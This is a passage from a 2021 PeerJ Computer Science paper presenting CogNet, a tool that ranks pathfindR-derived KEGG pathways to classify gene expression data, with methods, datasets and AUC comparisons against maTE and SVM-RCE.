Academic College, Zefat, Israel 2 Department of Information Systems, Zefat Academic College, Zefat, Israel 3 Department of Biostatistics and Medical Informatics, School of Medicine, Acibadem Mehmet Ali Aydinlar University, Istanbul, Turkey ABSTRACT Most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science, However, they do not prioritize biologically relevant genes since the ultimate goal is to determine features that optimize model performance metrics not to build a biologically meaningful model. Therefore, there is an imminent need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and machine learning. Integrative gene selection enables incorporation of biological domain knowledge from external biological resources. In this study, we propose a new computational approach named CogNet that is an integrative gene selection tool that exploits biological knowledge for grouping the genes for the computational modeling tasks of ranking and classification. In CogNet, the pathfindR serves as the biological grouping tool to allow the main algorithm to rank active-subnetwork-oriented KEGG pathway enrichment analysis results to build a biologically relevant model. CogNet provides a list of significant KEGG pathways that can classify the data with a very high accuracy. The list also provides the genes belonging to these pathways that are differentially expressed that are used as features in the classification problem. The list facilitates deep analysis and better interpretability of the role of KEGG pathways in classification of the data thus better establishing the biological relevance of these differentially expressed genes. Even though the main aim of our study is not to improve the accuracy of any existing tool, the performance of the CogNet outperforms a similar approach called maTE while obtaining similar performance compared to other similar tools including SVM-RCE. CogNet was tested on 13 gene expression datasets concerning a variety of diseases. Subjects Bioinformatics, Data Science Keywords Classification, Gene expression, Enrichment analysis, KEGG pathway, Rank, Machine learning, Bioinformatics, Data science, Data mining, Genomics INTRODUCTION Due to recent advances in DNA gene expression technology, it is now feasible to obtain gene expression profiles of tissue samples at relatively low costs. Data from genome-wide gene expression analyses are helping scientists and physicians understand the disease How to cite this article Yousef M, Ülgen E, Uğur Sezerman O. 2021. CogNet: classification of gene expression data based on ranked active- subnetwork-oriented KEGG pathway enrichment analysis. PeerJ Comput. Sci. 7:e336 DOI 10.7717/peerj-cs.336 Submitted 17 September 2020 Accepted 23 November 2020 Published 22 February 2021 Corresponding author Malik Yousef, malik.yousef@zefat.ac.il Academic editor Faizal Khan Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.336 Copyright 2021 Yousef et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.336 mailto:malik.�yousef@�zefat.�ac.�il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.336 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ mechanisms and use that information to design platforms to assist in diagnosis, to assess prognosis, and to inform treatment plans. For instance, a study by Van ’t Veer et al. (2002) collected gene expression data on primary breast tumors of 117 young patients. Machine learning with feature selection was used to identify a gene expression signature strongly predictive of a short interval to distant metastases (“poor prognosis” signature), even in patients that were lymph node negative. Gene expression technologies are now producing large datasets associated with a variety of diseases. Due to the high dimensionality of the data and relatively small sample sizes, reliable interpretation of the data is a complicated and often overwhelming, and this is an important problem in bioinformatics research. Although sample sizes have continued to grow in recent years, new and efficient feature selection algorithms are still needed to overcome challenges in the existing methods (Vanjimalar, Ramyachitra & Manikandan, 2018), in order to achieve the full potential of this data in the development of gene-based diagnostic tests, drug discovery and therapeutic strategies for improving public health. Most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science. There is a need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and classification. Integrative gene selection incorporates biological domain knowledge to selection processes from external biological resources. The main aim of integrative gene selection is to generate a ranked list of features that provides high model performance and takes into consideration both statistical metrics applied on the gene expression data and the biological background information provided as external datasets. For example, biological background information may be Gene Ontology (GO) where it provides for each gene its product as Cellular Components (CC), Molecular Functions (MF), and Biological Processes (BP). GO is a way to capture biological knowledge in a computable form that consists from a set of concepts and their relationships with each other. The various methods that have been applied to the process of selecting disease-specific features from large gene expression datasets were reviewed recently (Pan, 2002; Lazar et al., 2012) and fall into three major categories: “filters”, “wrappers”, and “embedded approaches”. Briefly, the filter approach, not based on any machine learning algorithm, uses a statistic (ANOVA, t-test, etc.), wrappers use learning techniques to evaluate which features are useful, and embedded techniques combine the feature selection step and classifier construction. Pan (2002) recently compared different filtering methods, highlighting similarities and differences between three main methods: the t-test, a regression modeling approach, and a mixture model approach. Additional comparisons of filtering techniques are available in Lazar et al. (2012). Inza et al. (2004) also carried out a comparison between a filter metrics and a wrapper sequential search procedure applied on gene expression datasets. Integrative approaches become important topics (Bellazzi & Zupan, 2007; Fang, Mustapha & Sulaiman, 2014) in the emerging field of gene expression. GO (Ashburner et al., 2000) was used by Qi & Tang (2007) for genes ranking based on not only their individual discriminative powers but also the powers of biological information contained Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 2/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ in GO annotations. The algorithm is an iterative algorithm that starts by applying Information Gain (IG) to compute discriminative scores for each gene. Genes with a score of zero are removed from the analysis. The second step is to integrate the biological knowledge by annotating those surviving genes with GO term. The third step is to score the GO terms as the mean of its associated gene IG score. Move the gene with the highest IG from the GO term with the highest score, to the final list. This procedure is repeated until the final goal is reached. SoFoCles (Papachristoudis, Diplaris & Mitkas, 2010) is an interactive tool that enables semantic feature filtering in microarray classification problems with the use of external biological knowledge retrieved from the Gene Ontology. SoFoCles involves the calculation of semantic similarities between two feature sets in order to derive an enriched, semantically-aware final feature set. The GO terms are used in order to give a similarity score for each annotated gene. Fang, Mustapha & Sulaiman (2014) proposed an integrative gene selection based on filter method and association analysis for selecting genes that are not only differentially expressed but also informative for classification. Association analysis was employed to integrate microarray data with Gene Ontology (GO) and KEGG Pathways (KEGG) simultaneously. The performance of the integrative models verified the efficiency and scalability of association analysis in mining microarray data. An additional study that integrated KEGG with genetic meta information (DisGeNET (Piñero et al., 2019)) was proposed by Raghu et al. (2017). Their approach was a two-step analytical workflow that incorporates a new feature selection paradigm as the first step and that utilizes graphical causal modeling as the second step to handle the automatic extraction of causal relationships. Quanz, Park & Huan (2008) apply the method of pathways-as-features using the KEGG pathway database for the pathway extraction component and global test method for the pathway selection component. The genes in each pathway are then transformed into one single feature by mean normalization or logistic regression. The number of features of the transformed data is the number of pathways. For instance, for the diabetes data for which 17 pathways are selected, the dimensionality is reduced from 22, 283 to 17 for the classification task. Unsupervised gene selection using biological knowledge-based GO terms was suggested by Acharya, Saha & Nikhil (2017). They have utilized gene annotation data, where each gene is represented as a structural information content (IC) based gene-GO term annotation vector which intuitively forms a gene-GO term annotation matrix for a selected data set. IC is the information content of a GO term is related to how often the term is applied to genes in the database. A very interesting study that emphasizes the need for an integrative approach was conducted by Perscheid, Grasnick & Uflacker (2019). Their work compared the performance of traditional and integrative gene selection approaches. Moreover, they propose a straightforward approach to integrate external knowledge with traditional gene selection approaches. The framework enables automatic external knowledge Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 3/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ integration, gene selection, and evaluation. The study shows that the integration of external knowledge improves overall analysis results. Feature selection and discovering the molecular explanation of disease describe the same process, where the first one is a computer science term and the second one is used in the biomedical sciences. Several tools are now available that allow users to break the fixed set paradigm in assessing the statistical enrichment of sets of genes. In this regard, the gene set enrichment analysis is a very important method. Recently, different approaches were developed and become useful tools in gene expression analysis (Cohn-Alperovich et al., 2016; Ulgen, Ozisik & Sezerman, 2019). PathfindR (Ulgen, Ozisik & Sezerman, 2019) is a tool for pathway enrichment analysis utilizing active subnetworks (An active subnetwork can be defined as a group of interconnected genes in a protein-protein interaction network (PIN) that predominantly consists of significantly altered genes). It identifies gene sets that form active subnetworks in a protein-protein interaction network using a list of genes provided by the user. It then performs pathway enrichment analyses on the identified gene sets. In most enrichment approaches, relational information captured in the graph structure of a PIN is overlooked as genes in the network neighborhood of significant genes are not taken into account. The approach pathfindR uses for exploiting interaction information to enhance pathway enrichment analysis is active subnetwork search. Briefly, active subnetwork search enables inclusion of genes that are not significant genes themselves but connect significant genes. This results in the identification of phenotype- associated connected significant subnetworks. Initially identifying active subnetworks in a list of significant genes and then performing pathway enrichment analysis of these active subnetworks efficiently, pathfindR exploits interaction information between the genes. This, in turn, helps pathfindR uncover relevant mechanisms underlying the disease. Support Vector Machines-Recursive Cluster Elimination (SVM-RCE) is a machine learning algorithm based on grouping/clustering gene expressions for scoring each cluster of genes (Yousef et al., 2007). Interest in this approach has grown over time and a number of publications based on SVM-RCE that have successfully applied this approach to identifying those features directly associated with a disease/condition are being published. This increasing interest is based on a reconsideration of how feature selection in biological datasets can benefit from considering the biomedical relationships of the features in the selection process. The usefulness of SVM-RCE then led to the development of additional computational tools. Similar studies for SVM-RCE were carried out (Harris & Niekerk, 2018; Lazzarini & Bacardit, 2017) indicating the importance of the merit of SVM-RCE approach. The study of Deshpande et al. (2010) is a derivative of SVM-RCE algorithm with small modification for disease state prediction. Additionally, they have used our invented term “recursive cluster elimination”. Most interestingly, the study of Zhao, Wang & Chen (2017) has used the SVM-RCE tool for comparison tasks applied for detection on expression profiles for identifying microRNAs related to venous metastasis in hepatocellular carcinoma. SVM-RNE (Yousef et al., 2009) is a similar approach to SVM-RCE, and uses the GXNA (Nacu et al., 2007) tool to extract the genes networks from the gene expression data. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 4/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Those networks serve as groups/clusters of genes that are subject to the rank procedure. A similar study to SVM-RNE was carried out by Johannes et al. (2010) for the integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. The term knowledge-driven variable selection (KDVS) is a similar term of integration of biological knowledge in the process of feature selection. In Zycinski et al. (2013), the authors proposed a KDVS framework, which uses a priori biological knowledge in highthroughput data analysis, and applied this framework to SVM-RNE. The most recent tool that integrates biological knowledge for grouping the genes was maTE (Yousef, Abdallah & Allmer, 2019), which uses the same approach based on the interactions of microRNAs (miRNA) and their gene targets. The maTE approach is different from SVM-RCE and SVM-RNE in that it integrates additional input to the algorithm which is the information about miRNA and its target set. The benefit of integration of biological knowledge led us to suggest a new tool called CogNet, that integrates biological knowledge derived from integrating the pathfindR tool into an integrative approach. In CogNet, the pathfindR tool serves as the biological grouping function allowing the main algorithm to rank active-subnetwork-oriented KEGG pathway enrichment analysis results. The details of the tool will be described in the following sections. MATERIALS AND METHODS The computational tool CogNet that we developed is based on the concept of integration of biological knowledge with machine learning in order to perform two tasks: the first task is ranking the groups of genes (in this case, pathway genes) and then use the top groups (significant groups) to build a machine learning model. Figure 1 displays the general Figure 1 General workflow for integrating biological information for grouping the genes by bioF() function. BioF() could be microRNA targets association, KEGG pathway association or other association. Full-size DOI: 10.7717/peerj-cs.336/fig-1 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 5/20 http://dx.doi.org/10.7717/peerj-cs.336/fig-1 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ workflow of integrating biological information for grouping the genes by a biological grouping functions. The CogNet components meet the general approach of the integration of biological knowledge with machine learning as described in Fig. 1. In fact, the tools SVM-RCE, SVM-RNE, and maTE also fit the general approach described in Fig. 1. Let us assume that we are given a two-class data D, which consists of k samples and n genes. Let us assume that the biological grouping function groups the n genes into m groups as following: bioF(g1,g2,…,gn) = {grp1,grp2,…,grpm}. bioF() can also assign some genes to a specific group that contains genes about which there is no biological knowledge. The bioF() function is used in order to group/cluster the genes using biological information that could be associated with a specific biological concept. For example, bioF() could group genes according to their miRNA targets (as the tool maTE did), or might be according to disease, meaning that groups of genes are associated with specific diseases. The ranking step is based on the machine learning algorithm used. In order to estimate the significance of each group grpi of genes, the following algorithm is applied: 1. Create a new data D� that contains only genes from the grpi. 2. Apply cross validation using the ML algorithm. 3. Assign a score to grpi. The score is the average of the performance metric (could be accuracy, the area under the curve, f-measure, etc.) pathfindR In this section, we describe the pathfindR tool that serves as the bioF() function (Fig. 1) in the CogNet tool. Active-subnetwork-oriented KEGG pathway enrichment analysis of the proteins was conducted using the R package pathfindR (Ulgen, Ozisik & Sezerman, 2019). Active subnetworks are subnetworks within the PIN (BioGRID, by default) that have a locally maximal score (based on the provided significance values). Active subnetworks define distinct disease-associated sets of interacting genes, whether discovered through the original analysis or discovered because of being in interaction with a significant gene. The workflow of pathfindR is presented in Fig. 2. After processing the input (to filter the differential expression results, the p value threshold was chosen as 0.2), pathfindR maps the input genes onto a PIN. Using the mapped genes, an active subnetwork search (with the greedy approach as default) is performed. The resulting active subnetworks are then filtered based on their scores and the number of significant genes they contain. This filtered list of active subnetworks is then used for enrichment analyses (over- representation analysis via hypergeometric-distribution-based tests), that is, using the genes in each of the active subnetworks, the significantly enriched pathways are identified. Enriched pathways with adjusted p values larger than the given threshold (0.2 was used) are discarded and the lowest adjusted p-value (overall active subnetworks) for each term is kept. This process of “active subnetwork search + enrichment analyses” is repeated for a selected number of iterations (default is 10), performed in parallel. Over all iterations, the lowest and the highest adjusted-p values, as well as the number of occurrences over all iterations are reported for each significantly enriched pathway. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 6/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ The CogNet tool The CogNet algorithm is based on the general approach of integrating biological information for grouping the genes as described in Fig. 1. Overall, the tool is composed of two components. The first component is the pathfindR step that is serving to generate the groups of genes, which are enriched KEGG pathways. Then, the second component is applied to rank those groups in terms of their contribution to separate the two-class data D. The workflow of the tool is presented in Fig. 3. The CogNet starts by splitting the data into two parts. The first part is the training part that is used in order to rank the pathways produced by the tool pathfindR. The test part is utilized at the end of the algorithm in order to estimate the performance of the CogNet. A list of genes and their p-values represented in a table is created to serve as input to pathfindR (Table 1). The list is computed using Student’s t-test to assign for each gene its differential expression significance (p-value). The pathfindR tool is invoked to create n Figure 2 Flow diagram of the pathfindR active-subnetwork-oriented enrichment analysis approach. Image credit: Coort S, Hanspers K, Waagmeester A, Defay A et al. (https://www.wikipathways.org/index. php/Pathway:WP1403), CC0 1.0 Universal (CC0 1.0). Full-size DOI: 10.7717/peerj-cs.336/fig-2 Figure 3 CogNet workflow. Full-size DOI: 10.7717/peerj-cs.336/fig-3 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 7/20 https://www.wikipathways.org/index.php/Pathway:WP1403 https://www.wikipathways.org/index.php/Pathway:WP1403 http://dx.doi.org/10.7717/peerj-cs.336/fig-2 http://dx.doi.org/10.7717/peerj-cs.336/fig-3 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ significant KEGG pathways, from now on, we refer to this as n groups of genes grp1,grp2,…, grpn. As a preprocess to the step of the ranking, each KEGG pathway is producing one data set out of the final data D that containing only genes of the specific pathway. Thus, n datasets D�i i = 1,2,…n, (with |grpi| as the number of genes) are created to be subject for the Rank step. Table 2 presents an example input table to Rank step. The Rank step is computed as a Monte Carlo cross-validation (MCCV), where for each D�i a score is assigned as the mean of computing accuracy of r iteration of splitting the data into two parts one for training and second for testing (for example, 80% training and 20% testing) applying random forest (or another ML algorithm such as SVM). The output of the stage is a sorted list of KEGG pathways according to the score assigned in the Rank step. Let refer to this list as grp�1, grp�2, …, grp�n. Table 3 presents an example of the output of Rank step. The final step is to compute the performance of the CogNet by training the RF on top pathways and test on the main test data (from the first stage of the algorithm). � gene_list={} � for i = 1 to n: a. gene_list = gene_list ∪ grp�n b. create Tr to be the data DTrain with just genes belongs to gene_list. Table 1 Example of input table to the tool pathfindR. Gene p-value SCARNA15 0.015915 CACNA1D 0.015915 IP6K3 0.015915 MIR1304 0.015915 DLX2 0.015915 SNORD77 0.015915 SGCG 0.015915 TCF21 0.015915 RPS21 0.021748 Note: The table consist from list of genes and its p-values. Table 2 Example of input table to the Rank step. ID p-value PathWay Genes hsa05165 8.79E−06 FZD7, THBS4, COL4A1, COL9A2, TNC, ITGA8, PTK2, PPP2CA, CCND2, IKBKB, ATP6V1G2, ATP6V0A2, JAG1, MAML3 hsa04151 1.40E−05 FGF2, IGF1, FLT3LG, ANGPT1, COL4A1, COL9A2, THBS4, TNC, ITGA8, PTK2, LPAR1, GNB1, MLST8, RPS6, PPP2CA, CCND2, IKBKB hsa04062 2.14E−05 CCL18, ADCY4, ADCY5, IKBKB, ROCK2, GNB1, PTK2, PRKCB, GRK5 hsa03010 1.82E−04 RPS6, RPS12, RPS21, RPS29, RPL17-C18orf32, RPL18, RPL22L1, RPL31 hsa05170 4.60E−05 PTK2, PRKCB, GNB1, IKBKB, CCNB3 Note: The list consists from three columns, ID is the KEGG Pathway id, p-value is the p-value of the pathways computed by pathfidR while the last column is the list of genes belonging to the KEGG pathway. Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 8/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ c. train RF on Tr and create an RF model. d. create Tst to be the data DTest with just genes belongs to gene_list. e. res{i} = performance of applying RF model on Tst. One of the outputs of the CogNet is a table that reports the performance on top 1, 2,…, n. However, we have created a table only for the top 10. We should state that n is a variable and is dependent on the data. Sometimes, n may not reach 10 because pathfindR reports only the significant KEGG pathways. In the worst case, the output of pathfindR could be an empty list. Another output is the significant list of KEGG pathways and also the significant genes. We run the CogNet algorithm multiple times (k times) where each time the data is split into 90% for training and 10% for testing. The CogNet keeps track of each KEGG pathway and the number of times appears on top of the list. Additionally, CogNet keeps track of the genes that belong to the pathway and how many times they were on the top. An example of input of top pathways and genes produced by CogNet is presented in Table 4. Implementation We have decided to use the free and open-source platform Knime (Berthold et al., 2009) due to its simplicity and very useful graphical representations. Additionally, Knime is a highly integrative tool. A script for performing analysis with pathfindR was imported as an R node to the Knime workflow. The Knime workflow consists mainly of nodes where each node has its own functionality. Meta- node is created as a collection of nodes that has a specific task to perform. The workflow Multi-File CogNet is presented in Fig. 4. It starts by uploading a list of the names of the datasets (URL) by the “List Files node”. Then a loop over those datasets to read each data by the node “Table Reader” and send it as input to the CogNet tool (CogNet meta-node). While Fig. 3 presents the flowchart of CogNet algorithm, Fig. 5 presents the implementation of CogNet as a Knime workflow with its meta-nodes. The input has two ports, where the first port is for the test data, the second port is for the training data. The training data is passed to the tool pathfindR (one of the meta-nodes) to process the data and get as an output a sorted table of significant pathways. The “RankPathWays” meta nodes perform the task of the ranking, while the flow between “Counting Loop start” and “Loop End” is for performing testing on top i pathways. It ranges from 1 to 10. Additional task for the node “Loop End” is to collect all the results and send them out to be processed and save the results. Gene expression data A total of 13 human gene expression datasets were downloaded from the gene expression omnibus (Clough & Barrett, 2016) at NCBI. For all datasets disease (positive) and control Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 9/20 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ (negative) data were available (Table 5). Those 13 datasets served to test the CogNet and for comparison with other two tools maTE and SVM-RCE. Model performance evaluation For each established model, we calculated a number of statistical measures like sensitivity, specificity, and accuracy to evaluate model performance. The following formulations were Table 3 Example output of Rank step. ID Acc Sen Spe Rec Prec Fm hsa05165 1.00 1.00 1.00 1.00 1.00 1.00 hsa04151 0.93 0.90 1.00 0.90 1.00 0.93 hsa03010 0.87 0.80 1.00 0.80 1.00 1.00 hsa05170 0.93 0.90 1.00 0.90 1.00 0.93 hsa05163 0.87 1.00 0.60 1.00 0.87 0.92 hsa04530 1.00 1.00 1.00 1.00 1.00 1.00 hsa04064 0.87 1.00 0.60 1.00 0.87 0.92 hsa05418 0.73 0.70 0.80 0.70 0.92 0.87 hsa05200 1.00 1.00 1.00 1.00 1.00 1.00 hsa04110 1.00 1.00 1.00 1.00 1.00 1.00 Note: The values are the mean of each performance metric appearing on the column title. Acc, accuracy; Sen, sensitivity; Spe, specificity; Rec, recall; Prec, precession; Fm, F-measure. Table 4 Example of output of top pathways and top genes. KEGG Pathway count Genes hsa03460 77 BRIP, RMI2,UBE2T hsa05034 70 CREB3L4,GNB4,HIST1H2AK,HIST1H2BC,HIST1H2BJ,HIST1H4H, HIST2H2AA4,PPP1R1B hsa05322 53 COL4A3,HIST1H2AK,HIST1H2BC,HIST1H2BJ,HIST1H4H,HIST2H2AA4 hsa04151 50 COL1A1,PRLR Figure 4 Multi-File CogNet workflow that applied on multiple datasets. Full-size DOI: 10.7717/peerj-cs.336/fig-4 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 10/20 http://dx.doi.org/10.7717/peerj-cs.336/fig-4 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ used to calculate the statistics (with TP: true positive, FP: false positive, TN: true negative and FN referring to false negative classifications): Sensitivity (SE, Recall) = TP/(TP + FN) Specificity (SP) = TN/(TN + FP) Accuracy (ACC) = (TP + TN)/(TP + TN + FP + FN); ACC Additionally, the Area Under the Receiver Operating Characteristic (ROC) Curve measure (AUC) (Bradley, 1997) is an estimate of the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative instance. All reported performance measures refer to the average of 10-fold MCCV. Some of the data sets used by the classifier are imbalanced, which can influence the classifier to the advantage of the set with more samples. This is known as the problem of the imbalanced class distribution. We have applied an under-sampling approach that reduces the number of samples of the majority class to the minority class, thus reducing the bias in the size distribution of the data subsets. We choose to apply the under-sampling of ratio 1:2. Availability and implementation The Knime workflow, implementing CogNet, is available at https://malikyousef.com -> Bioinformatics Tools and GitHub at https://github.com/malikyousef/miRcorrNet. The DOI of the tool is https://doi.org/10.5281/zenodo.4273942. RESULTS We have considered 13 gene expression data sets to test CogNet and for comparison with other similar tools. To our knowledge, no tools similar to CogNet exists. Nonetheless, we compare CogNet with tools that have similar merit of grouping and rankings, maTE and SVM-RCE. Although the purpose of the comparison is not to prove a higher performance, it outperforms maTE and gets similar performance to SVM-RCE with Figure 5 The main workflow (as meta-nodes) for CogNet. Full-size DOI: 10.7717/peerj-cs.336/fig-5 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 11/20 https://malikyousef.com https://github.com/malikyousef/miRcorrNet https://doi.org/10.5281/zenodo.4273942 http://dx.doi.org/10.7717/peerj-cs.336/fig-5 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ advantage of using a very smaller number of genes than SVM-RCE. Additionally, we have run CogNet with two versions, where the CogNet_SVM uses the SVM for the scoring and classification while the CogNet_RF uses Random Forest (RF) for Scoring and classification. The results for CogNet-SVM is provided in the Supplemental Data. Table 5 Description of the 10 data sets used in our study. The data sets are obtained from GEO. Each entry has the GEO code the name of the data, the number of samples and the classes of the data. GEO Accession Title Sample count Classes GDS1962 Glioma-derived stem cell factor effect on angiogenesis in the brain 180 pos = 157 neg = 23 non-tumor = 23 (neg) astrocytomas = 26 (pos) glioblastomas = 131 (pos) GDS2519 Early-stage Parkinson’s disease: whole blood 105 pos = 50 neg = 55 healthy control = 22 (neg) neurodegenerative disease control = 33 (neg) Parkinson disease = 50 (pos) GDS3268 Colon epithelial biopsies of ulcerative colitis patients 202 pos = 73 neg = 129 normal = 73 ulcerative colitis = 129 GDS2547 Metastatic prostate cancer (HG-U95C) 164 pos = 75 neg = 89 normal = 75 tumor = 89 GDS5499 Pulmonary hypertensions: PBMCs 140 pos = 99 neg = 41 control = 41 (neg) idiopathic pulmonary arterial hypertension = 30 (pos) scleroderma-associated pulm. arterial hypert. = 42 (pos) systemic sclerosis (SSc) without pulm. hypert. = 19 (pos) SSc, interstitial lung disease & pulm. hypert. = 8 (pos) GDS3646 Celiac disease: primary leukocytes 132 pos = 110 neg = 22 healthy control =22 celiac disease = 110 GDS3874 Diabetic children: peripheral blood mononuclear cells (U133A) 117 neg = 24 pos = 93 healthy = 24 type 1,2 diabetes =93 GDS3837 Non-small cell lung carcinoma in female nonsmokers 120 pos = 60 neg = 60 Lung Cancer = 60 Control = 60 GDS5037 Severe asthma: bronchial epithelial cell 108 Pos = 88 Neg = 20 mild asthma = 50 control = 20 severe asthma = 38 GDS4516_4718 Colorectal cancer: laser microdissected tumor tissues Colorectal cancer: homogenized tumor tissues 148 pos = 104 neg = 44 laser microdissected tumor tissues = 104 homogenized tumor tissues = 44 GSE4107 (GDS2609) Colonic mucosa 22 pos = 12 neg = 10 colonic mucosa of healthy control = 12 colonic mucosa patients = 10 GSE15573 (GDS3794) Rheumatoid Arthritis (RA) Patients 33 pos = 18 neg = 15 18 Rheumatoid Arthritis (RA) 15 Control GSE5594 (GDS4824) Prostate cancer Analysis of malignant and benign prostate tissues 21 pos = 13 neg = 8 prostate cancer = 13 normal = 8 Yousef et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.336 12/20 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS1962 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2519 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3268 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2547 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5499 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3646 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3874 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3837 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS5037 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4516 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE4107 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS2609 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE15573 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS3794 http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE5594 https://www.ncbi.nlm.nih.gov/sites/GDSbrowser?acc=GDS4824 http://dx.doi.org/10.7717/peerj-cs.336 https://peerj.com/computer-science/ Table 6 (A–C) A summary result table presenting the AUC of each tool over 13 data sets. #Clusters/#Groups are related to the number of clusters for SVM-RCE and groups for maTE and CogNet. AUC is average of for the performance of area under curve while #G is the average number of genes for each level. #Clusters/ #Groups SVM-RCE GDS1962 GDS2519 GDS2547 GDS3268 GDS3646 GDS3837 GDS3874 GDS4516_4718 GDS5037 GDS5499 GDS2609 GDS3794 GDS4824 AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC 10 1.00 0.50 0.84 0.90 0.90 0.97 0.75 1.00 0.48 0.95 1.00 1.00 1.00 9 1.00 0.49 0.84 0.90 0.82 0.98 0.81 1.00 0.57 0.93 0.99 0.98 1.00 8 1.00 0.49 0.85 0.90 0.87 0.98 0.79 1.00 0.53 0.94 0.96 0.98 1.00 7 1.00 0.49 0.85 0.89 0.86 0.98 0.78 1.00 0.53 0.93 0.97 0.98 1.00 6 1.00 0.48 0.85 0.89 0.87 0.98 0.81 1.00 0.53 0.95 0.96 0.98 1.00 5 1.00 0.47 0.85 0.88 0.87 0.98 0.79 1.00 0.50 0.94 0.96 0.98 1.00 4 1.00 0.44 0.84 0.88 0.87 0.98 0.78 1.00 0.44 0.95 0.96 0.98 1.00 3 1.00 0.46 0.84 0.89 0.87 0.98 0.74 1.00 0.48 0.95 0.93 0.98 1.00 2 1.00 0.44 0.81 0.87 0.84 0.98 0.79 1.00 0.43 0.93 0.91 0.98 1.00 1 1.00 0.45 0.80 0.84 0.76 0.97 0.66 1.00 0.50 0.90 0.90 0.95 1.00 Avg 1.00 0.47 0.84 0.88 0.85 0.98 0.77 1.00 0.50 0.94 0.95 0.98 1.00 #Clusters/ #Groups #G #G #G #G #G #G #G #G #G #G #G #G #G 10 845 801 896 852 341 904 569 734 505 507 676 442 611 9 827 791 875 818 311 868 586 712 492 493 652 437 536 8 806 752 804 761 272 807 572 675 483 460 638 421 515 7 760 715 747 702 245 772 542 633 436 437 625 413 491 6 720 678 686 644 224 694 499 580 428 394 584 397 468 5 678 638 636 595 209 604 464 555 399 329 558 361 453 4 593 575 544 568 169 486 432 444 348 265 511 340 422 3 429 504 466 470 142 419 375 319 307 225 470 310 381 2 363 444 449 377 74 283 318 188 238 171 390 227 310 1 237 266 373 211 47 137 224 91 131 62 264 120 211 #Clusters/ #Groups CogNet_RF GDS1962 GDS2519 GDS2547 GDS3268 GDS3646 GDS3837 GDS3874 GDS4516_4718 GDS5037 GDS5499 GDS2609 GDS3794 GDS4824 AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC AUC 10 1.00 0.65 0.84 0.72 0.76 0.98 0.90 1.00 0.68 0.95 1.00 0.93 0.92 9 0.99 0.65 0.85 0.76 0.76 0.97 0.86 1.00 0.66 0.94 1.00 0.95 1.00 8 0.99 0.63 0.86 0.75 0.76 0.99 0.87 1.00 0.64 0.93 1.00 0.98 1.00 7 0.99 0.68 0.86 0.74 0.76 0.98 0.87 1.00 0.70 0.93 1.00 1.00 1.00 6 0.98 0.55 0.84 0.74 0.68 0.98 0.85 1.00 0.71 0.93 1.00 1.00 1.00 5 0.99 0.74 0.83 0.75 0.68 0.98 0.89 1.00 0.72 0.94 1.00 1.00 0.80 4 0.98 0.68 0.83 0.72 0.66 0.97 0.89 1.00 0.69 0.94 1.00 0.93 0.80 3 0.98 0.66 0.83 0.73 0.68 0.96 0.91 1.00 0.71 0.94 1.00 0.88 0.90 2 0.98 0.65 0.78 0.73 0.64 0.97 0.89 1.00 0.72 0.93 1.00 0.85 0.90 1 0.99 0.59 0.74 0.75 0.72 0.91 0.86 1.00 0.74 0.93 1.00 0.88 0.85 Avg 0.99 0.65 0.83 0.74 0.71 0.97 0.88 1.00 0.70 0.94 1.00 0.94 0.92 #Clusters/ #Groups #G #G #G #G #G #G #G #G #G #G #G #G #G 10 123 65 62 65 15 34 23 45 